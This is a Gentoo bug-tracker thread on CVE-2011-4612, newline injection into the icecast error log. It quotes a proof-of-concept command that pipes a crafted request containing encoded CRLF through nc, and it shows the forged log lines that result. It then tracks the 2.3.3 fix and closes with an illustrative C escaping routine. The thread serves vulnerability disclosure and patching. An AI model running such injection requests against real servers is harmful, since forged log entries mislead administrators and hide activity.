Jamie Strandboge <jamie@canonical.com> reported to the icecast developers (CCing <oss-security@lists.openwall.com>) the possibility of injecting a fake message into the icecast error log with a specially crafted HTTP request sent to the icecast server port, discovered by Moritz Naumann:

"Newline injection in error.log

Running this command against an icecast2 running on 127.0.0.1...

    echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null

...causes the following to be written to /var/log/icecast2/error.log:

    [2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory
    [1970-01-01 00:00:00] PHUN I'm feeling phunny
    ..."

Source: http://thread.gmane.org/gmane.comp.audio.icecast.devel/1815

Upstream responded that version 2.3.3, fixing this, would be released soon.
Thanks for the bug, Petr.
I was able to reproduce the fake log file with the same info as referenced here: https://bugs.launchpad.net/ubuntu/+source/icecast2/+bug/894782

netcat must be installed, of course.
Any news? Because 2.3.3 is released.
The 2.3.3 fixes this issue:

r18355 | dm8tbr | 2012-06-07 17:57:11 +0200 (Čt, 07 čen 2012) | 3 lines

This is part of the patch-set addressing CVE-2011-4612.
2.3.3 now in portage. I can only do a limited testing on my webserver so please give it a try (or please ATs, test as much as you can) before marking it stable.
(In reply to comment #5)
> 2.3.3 now in portage. I can only do a limited testing on my webserver so
> please give it a try (or please ATs, test as much as you can) before marking
> it stable.

Thanks, Markos.

Arches, please test and mark stable:
=net-misc/icecast-2.3.3
Target KEYWORDS: "alpha amd64 ppc ppc64 sparc x86"
I stumbled upon bug 430434.
x86 done, thanks!
ppc done
amd64 done
alpha/sparc keywords dropped
+ 18 Sep 2012; Kacper Kowalik <xarthisius@gentoo.org> icecast-2.3.3.ebuild: + ppc64 stable wrt #394847, add missing inherit of user.eclass and explicit + RDEPEND ppc64 stable, last arch done
Thanks, everyone. GLSA vote: no.
Thanks, folks. GLSA Vote: No, too, closing.
CVE-2011-4612 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4612): icecast before 2.3.3 allows remote attackers to inject control characters such as newlines into the error log (error.log) via a crafted URL.
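
The class of fix for the newline injection described in this bug, as an added example; it is not icecast's code or the upstream patch. It escapes a percent-decoded request path before it is written to a one-record-per-line log. The names url_decode and log_escape and the sample request path are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>
static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    c |= 0x20;
    return (c >= 'a' && c <= 'f') ? c - 'a' + 10 : -1;
}

/* Stand-in for the server's percent-decoding (hypothetical helper). */
size_t url_decode(const char *src, char *dst, size_t cap) {
    size_t n = 0;
    int hi, lo;
    if (cap == 0) return 0;
    while (*src && n + 1 < cap) {
        if (*src == '%' && (hi = hexval((unsigned char)src[1])) >= 0
                        && (lo = hexval((unsigned char)src[2])) >= 0) {
            dst[n++] = (char)(hi * 16 + lo);
            src += 3;
        } else dst[n++] = *src++;
    }
    dst[n] = '\0';
    return n;
}

/* Escape for a one-record-per-line log: control, DEL, non-ASCII, '\' -> \xNN. */
size_t log_escape(const char *in, size_t len, char *out, size_t cap) {
    static const char hex[] = "0123456789abcdef";
    size_t n = 0;
    if (cap == 0) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)in[i];
        int esc = c < 0x20 || c >= 0x7f || c == '\\';
        if (n + (esc ? 5 : 2) > cap) break;   /* truncate, never overflow */
        if (esc) {
            out[n++] = '\\'; out[n++] = 'x';
            out[n++] = hex[c >> 4]; out[n++] = hex[c & 15];
        } else out[n++] = (char)c;
    }
    out[n] = '\0';
    return n;
}

int main(void) {
    /* Constructed sample request path, not captured traffic. */
    const char *req = "/missing%0d%0a[1970-01-01 00:00:00] WARN forged";
    char dec[128], safe[256];
    log_escape(dec, url_decode(req, dec, sizeof dec), safe, sizeof safe);
    printf("checking for file %s\n", safe);
    return 0;
}
```

Escaping the backslash as well keeps the encoding unambiguous, so a reader of the log can tell an escaped byte from a literal "\x0a" sent by the client.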